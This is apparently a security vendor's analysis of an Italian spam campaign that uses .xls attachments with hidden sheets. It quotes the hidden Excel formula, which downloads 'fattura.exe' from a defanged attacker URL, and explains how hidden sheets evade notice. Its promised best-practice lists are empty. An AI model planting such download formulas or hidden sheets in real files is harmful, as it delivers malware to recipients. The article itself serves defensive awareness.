Figure 1. Sample Italian email propagating .xls attachments with hidden sheets
Figure 2. Opened .xls attachment
Upon downloading and opening the attachment, a prompt to “Enable Content” appears. At first glance, the Excel file appears empty. Once enabled, the file will attempt to connect to a URL and download another file through the formula “=FORMULA(“hxxp://gstat.dondyablo[.]com/fattura.exe”, $BB$54”. Note that the hidden sheet still won’t show itself even after enabling the content.
Figure 3. Hidden formula in the .xls file
The hidden sheet can be manually unhidden, as it is only set to hidden and not to “very hidden.” Very hidden sheets are not accessible via the Excel user interface unless another tool is used. Hidden sheets and formulas can be used to potentially download malicious files and connect to suspicious domains, opening more possibilities for the threat actors.
Figure 4. Unhiding the hidden sheet
We recently saw a similar campaign using a malicious Microsoft Excel 4.0 Macro sheet with a suspicious formula that is set to “very hidden.” It was also propagated through spam emails.
Spam email is one of the vehicles cybercriminals use to spread malicious files. Users can defend against these types of threats with the following best practices:
Security solutions can also help safeguard against spam and other email-based threats:
For the list of IoCs, please refer to this document.
Like it? Add this infographic to your site:
1. Click on the box below. 2. Press Ctrl+A to select all. 3. Press Ctrl+C to copy. 4. Paste the code into your page (Ctrl+V).
Image will appear the same size as you see above.